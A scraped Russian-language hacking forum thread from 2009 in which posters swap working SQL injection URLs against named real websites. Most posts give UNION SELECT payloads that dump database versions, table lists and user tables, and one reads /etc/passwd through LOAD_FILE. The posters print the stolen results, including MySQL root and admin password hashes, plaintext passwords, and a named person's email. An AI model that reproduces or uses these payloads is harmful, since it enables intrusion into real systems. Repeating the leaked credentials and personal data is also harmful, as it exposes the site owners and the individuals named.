http://www.navarrocollege.edu/former.php?id=-159'+union+select+1,version(),3,4,5,6,7,8,9,10,11, 12,13,14+--+
4.1.20
HAXTA4OK
07.05.2009, 13:16
PR: 3
http://www.radhaus-am-rathaus.de/index.php?page=partner&id=1+union+select+1,concat_ws(0x3a,version(),datab ase(),u ser()),3,4,5,6,7,8,9--
5.0.45:radhaus_08:rad_user@localhost
таблы:
download
download_download
download_kategorien
galerie
index_banner_1
link_kategorien
link_links
mitarbeiter_standard
news
pages
pages_txt
simple
simple_txt
standards
standards_entries
su
su_navi
verein_sponsor
------------------------------------------------------------------------
http://am-galerie.de/home.php?id=1&content_id=-12+union+sel ect+1,2,conca t_ws(0x3a,version(),database(),user()),4,5,6--&color=CAE29B
5.0.24-Debian_0.dotdeb.0-log:de9414:de9414@localhost
http://am-galerie.de/home.php?id=1&content_id=-12+union+select+1,2,group_concat(table_name),4,5,6 +fr om+infor mation_schema.tables+group+by+table_schema--&color=CAE29B
таблы:
artists,content,images,menus
------------------------------------------------------------------------
PR: 4
http://www.apo-klein-am-markt.de/index.php?c=1&id=-1+union+select+1,concat_ws(0x3a,vers ion(),database(),u ser())--
(вывод смареть в html коде)
4.0.27-log:DB105344:U105344@cohen.store
HAXTA4OK
07.05.2009, 14:05
PR: 4
http://www.nakoil.am/Groups.php?id=1+union+select+1,concat_ws(0x3a,vers ion(),data base(), user()),3--
5.0.67-community-log:nakoil_DB:nakoil_ash@localhost
http://www.patagoniaexpeditionrace.com/en/news_detail.php?news=-1+UNION+SELECT+1,2,3,4,5,concat(user(),0x3a,versio n(),database()),7,8,9,10,11,12,13
http://www.patagoniaexpeditionrace.com/en/news_detail.php?news=-1+UNION+SELECT+1,2,3,4,5,LOAD_FILE(0x2F6574632F706 173737764),7,8,9,10,11,12,13
sitio@cgi1101.int.bizland.net:5.0.45-logsitio
Skofield
07.05.2009, 16:43
http://www.garradhassan.com Page Rank 6
http://www.garradhassan.com/corporate/newsitem.php?story=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(), database(),user()),7--
version() - 5.0.51b-community-nt
database() - ghcom
user() - root@localhost
tables:
http://www.garradhassan.com/corporate/newsitem.php?story=-1+union+select+1,2,3,4,5,group_concat(table_name), 7+from+information_schema.tables--
http://www.garradhassan.com/corporate/newsitem.php?story=-1+union+select+1,2,3,4,5,concat_ws(0x3a,table_sche ma,table_name),7+from+information_schema.tables+wh ere+table_name=0x75736572--
mysql.user:
http://www.garradhassan.com/corporate/newsitem.php?story=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user,passw ord),7+from+mysql.user--
root:373ba1c07f888b3b:3y35alphA
helpdesk:*246AAAE25BC090A8A06E3211EAD3827FA6A8819A :spooky
web:*B55160D1065FEAB0F8EEA92C8AD493C8DCCA537B:хз :(
--------------------------------------------------------------------------------
http://dtincr.ph PR 5
http://dtincr.ph/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user())--
5.0.67-community:dtincr_db:dtincr_dtincr@localhost
_SEREGA_
07.05.2009, 18:02
скуль:
http://www.aprileonline.info/notizia.php?id=-11774+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16--
версия:
http://www.aprileonline.info/notizia.php?id=-11774+union+select+1,2,3,4,5,version(),7,8,9,10,11 ,12,13,14,15,16--
5.0.27
таблицы выводятся limit'om:
http://www.aprileonline.info/notizia.php?id=-11774+union+select+1,2,3,4,5,table_name,7,8,9,10,1 1,12,13,14,15,16+from+information_schema.tables--
столбцы выводятся limit'om:
http://www.aprileonline.info/notizia.php?id=-11774+union+select+1,2,3,4,5,column_name,7,8,9,10, 11,12,13,14,15,16+from+information_schema.columns--
infa:
http://www.aprileonline.info/notizia.php?id=-11774+union+select+1,2,3,4,5,concat_ws(0x3a,user() ,database()),7,8,9,10,11,12,13,14,15,16--
user() aprile_info@localhost
database() aprileonline_info
PR 7
http://www.daisy.org/news/news_detail.php?NewsId=-398+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,user (),version(),database()),9,10,11,12,13,14,15,16,17 ,18
daisyorg_kathy@localhost:5.0.75-percona-highperf-b12:daisyorg_daisy2
28 :In database daisyorg_daisy2 found table Contributor
1 : ContributorId
2 : PartnerId
3 : EntryDate
4 : ChangeDate
5 : ChangeId
6 : StartDate
7 : ExpireDate
8 : Password
9 : PasswordDate
10 : NoCookieLogon
11 : Title
12 : FirstName
13 : LastName
14 : OrgFunction
15 : DaisyFunction
16 : SoundFilePath
17 : ImageFilePath
18 : Email
19 : Comment
20 : AccessLevel
21 : IsStaffMember
22 : IsBoardMember
23 : IsProductManager
24 : IsAccountManager
25 : Address
26 : Telephone
27 : Cellphone
28 : Fax
29 : LastVisit
30 : LastUsedEquipment
DrAssault
07.05.2009, 18:34
http://www.delea.ch/en/content/eventidettgm.php?Id=63+union+select+1,2,3,4,5,6,7, 8,concat_ws(0x3a,user,password)+from+mysql.user/*
nicola:0c035f4940eaac57
HAXTA4OK
07.05.2009, 21:03
PR: 8 перый раз вижу PR:8 ;)
http://www.ufmg.br/nej/am/modules/content/index.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version (),database (),user()),5,6,7,8,9,10,11--
http://www.ufmg.br/nej/am/modules/content/index.php?id=-1+union+select+1,2,3,group_concat(table_name),5,6, 7,8,9,10,11+from+information_schema.tables+group+b y+table_schema+l imit+1,1- -
таблы:
ohIXq_tld_block_instance,2006_configoption,nejs__c onfig,am__groups_users_link,ohIXq_tld_ranks,nejs__ profile_fieldcategory,am__smartsection_mimetypes,2 006_users,ohIXq_tld_config,nejs__configoption,am__ imagebody,2006_imgset_tplset_link,ohIXq_tld_avatar _user_link,2006_block_module_link,nejs__bannerclie nt,am__contactplus_elements,ohIXq_tld_newblocks,ne js__newblocks,am__smartsection_categories,2006_tpl set,2006_imgset,am__xoopsnotifications,am__block_m odule_link,ohIXq_tld_xoopscomments,nejs__users,200 6_banner,am__profile_category,2006_stories_files,o hIXq_tld_imgset,nejs__imgset,2006_groups_users_lin k,ohIXq_tld_tplsource,nejs__tplset,am__user_profil e,am__banner,ohIXq_tld_groups_users_link,nejs__gro ups_users_link,am__modules,2006_ranks,ohIXq_tld_bl ock_module_link,2006_contactplus_elements,nejs__co nfigcategory,am__image,ohIXq_tld_session,nejs__ran ks,am__smiles,2006_xoopscomments,ohIXq_tld_configc ategory,nejs__contactplus_elements,am__imagecatego ry,2006_imgsetimg,ohIXq_tld_banner,2006_cjayconten t,nejs__bannerfinish,am_
http://www.ufmg.br/nej/am/modules/content/index.php?id=-1+union+select+1,2,3,concat_ws(0x3a,uid,uname,logi n na me,name,email,user_avatar,pass,rank,level),5,6,7,8 ,9,10,11+from+nejs__users--
1:Lyslei Nascimento:lyslei::lyslei@ufmg.br:blank.gif:3f8454 b7f2c12cebb1622b6b0dfd1021:7:5
(хрен знает куда вводить,нашел одну какую то , но там глух етот акк)
кто найдет ввод, напишите в ЛС плиз))))
http://www.oboefm.ru/note_view.php?note=106&id_notes=14'+union+select+concat_ws(0x2f2a2a2f,dat abase(),version(),user()),2,3,4--+
Гобой FM =))
HAXTA4OK
07.05.2009, 21:15
PR: 6
http://www.pco.org.br/conoticias/ver_sessao.php?id=1&am=20 08-11'+union+select+concat_ws(0x3a,version(),dat abase(),user()),2,3,4,5,6,7,8/*
5.0.24a-locaweb-log:bd_pco:bd_pco@200.234.201.196
смотрим таблы)))но там не итересно)))бб
http://www.pco.org.br/conoticias/ver_sessao.php?id=1&am=2008-11'+un ion+select+table_name,2,3,4,5,6,7,8+from+informati on _schema.tables/*
------------------------------------------------------------------------
PR: 3
http://www.yerevaklur.am/tema.php?id=-1'+union+select+1,concat_ws(0x3a,database(),vers ion(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20/*
yerevaklur_lur:5.0.26-log:yerevaklur_lur@localhost
HAXTA4OK
07.05.2009, 21:47
PR: 4
http://www.sesc-am.com.br/atividades/3idade/programacao.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,database(),v ersion(),user()),6,7--
sesc_am:5.0.27:admin@localhost
таблы
http://www.sesc-am.com.br/atividades/3idade/progr amacao.php?id=-1+union+select+1,2,3,4,group_concat(table_name),6, 7+from+info rmation_schema.tables+group+by+table_schem a--
situacao_anomeses,distribuir,requisicao_pagamento, destino_ci,historico_req_transporte,situacao_trans porte,motivo_cancela_reqtransp,usuario,cod_orcamen tario,historico_contratacao,situacao_req_estoque,m otivo_alteracao_reqtransp,tipo_recurso,calendario, feriado,situacao_controle_outser,devolucao_retirad a,sexo,tipo_carga,almoxarifado,motivo_alteracao_ci ,situacao_calendario,encaminhar_ci,requisicao_reti rada,destino_obs,hora,situacao_usuario,mural,colab orador,historico_envio,situacao_req_pag,motivo_can cela_ci,tipo_retirada,cargo,funcao_colaborador,sit uacao_devolucao,tipo_destino,anexo_ci,motivo_alter acao_contrat,situacao_ci,endereco_ip,destino_trans p,requisicao_transporte,meses,suporte_gic,observac ao_ci,contratacao,historico_req_pag,situacao_retir ada,motivo_cancela_contrat,unidade,ci,funcao_modul o,situacao_gmt,tipo_doc_requisicao,ano,motivo_alte racao_reqpag,estado_retirada,situacao_circulacao,d etalhes_cardtemp,responsavel_setor,suporte_gmt,age nda,minuto,permis_modulo,corunidade,historico_req_ retirada,situacao_suport
------------------------------------------------------------------------
http://www.nature-ic.am/heating/project.php?b=2&id=-1+union+select+1,concat_ws(0x3a,da tabase(),version(),us er()),3,4,5,6,7,8,9--
natureic_heating:5.0.67-community-log:natureic_heating@localhost
http://www.nature-ic.am/heating/project.php?b=2&id=-1+union+select+1,group_concat(table_name),3,4,5,6, 7,8,9+from+informatio n_schema.tables+group+by+table_schema+limi t+1,1--
staff,information_text,news_eng,advisory_text,sem_ train,goals,links_eng,report_pilot_proj,cooperatio n_text_eng,library_eng,project,contact_eng,leg_tex t_eng,staff_eng,information_text_eng,advisory_text _eng,nister,sem_train_eng,goals_eng,menu,report_pi lot_proj_eng,exp_projects,link_types,project_eng,c ooperation,legislation,announcement,nister_eng,int er_exp,sem_train_text,information_for,menu_eng,sem _text,exp_projects_eng,link_types_eng,publication, cooperation_eng,legislation_eng,other_projects,ann ouncement_eng,inter_exp_eng,sem_train_text_eng,inf ormation_for_eng,news,sem_text_eng,glossary,links, publication_eng,cooperation_text,library,other_pro jects_eng,contact,leg_text
HAXTA4OK
07.05.2009, 22:32
PR: 6
http://www.24hours.ge/index.php?n=264&r=1&id=1+union+select+1,concat_ws(0x3a,database(),vers ion(),user()),3,4,5,6,7,8,9, 10--
24hours_eng:5.0.51-log:24hours@localhost
http://www.24hours.ge/index.php?n=264&r=1&id=1+union+select+1,table_name,3,4,5,6,7,8,9,10+fr om+ information_sch ema.t ables--
куча таблов
log_users
users
phpbb_users(форума вообще не нашел)
-------------------------------------------------------------------------------
http://mitex.ge/index.php?lang=eng&request=news&id=-1+union+select+1,concat_ws(0x3a,versi on(),data ba se(),user()),3,4,5--
4.1.7-max-log:mitex:mitex@localhost
DrAssault
07.05.2009, 23:15
http://www.mobil-obchod.cz/category.asp?catcode=-13+union+select+1,2,3,4,group_concat(concat_ws(0x3 a,username,password)+separator+0x0a),6,7,8,9,10+fr om+users/*
alfasoft1:alfa1234
andy:andy7890
jirka:jirka456
everybody:everybody
HAXTA4OK
07.05.2009, 23:39
PR: 4
http://www.arigram.gr/en/info_frame.php?id=1+union+select+1,2,3,4,concat_ws (0x3a,database(),versio n(),us er()),6--
arigram_arigram:5.0.67-community:arigram_arigram@localhost
------------------------------------------------------------------------
PR: 2
всем бы такие )))
http://www.greekmuscle.net/gr/profiles/profile.php?id=1+union+select+1,2,concat_ws(0x3a,d atabase(),version(),user()),4,5,6,7,8,9,10,11,12,1 3--&type=interviewGr
4.1.22-max-log:greekmuscle@68.178.254.189
Kimliksiz
08.05.2009, 02:58
http://www.ali.web.id/index.php?option=com_mambads&Itemid=ProgenTR&func=view&cacat=-1%20union%20select%201,concat(username,0x3a,passwo rd),3%20from%20mos_users--
admin:37538eb37d1b20e60cec3e0030139216 ??
http://www.kolckmann.de/web/index.php?option=com_gmaps&task=viewmap&Itemid
28&mapId=1&Itemid=28index.php?option=com_gmaps&task=viewmap&Itemid=57&%20mapId=-1/**/union/**/select/**/0,username,password,3,4,5,%206,7,8/**/from/**/jos_users/*
ADMIN : fc4cfabb7764cd3eb98cc4aa7d1a0a75 ??
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot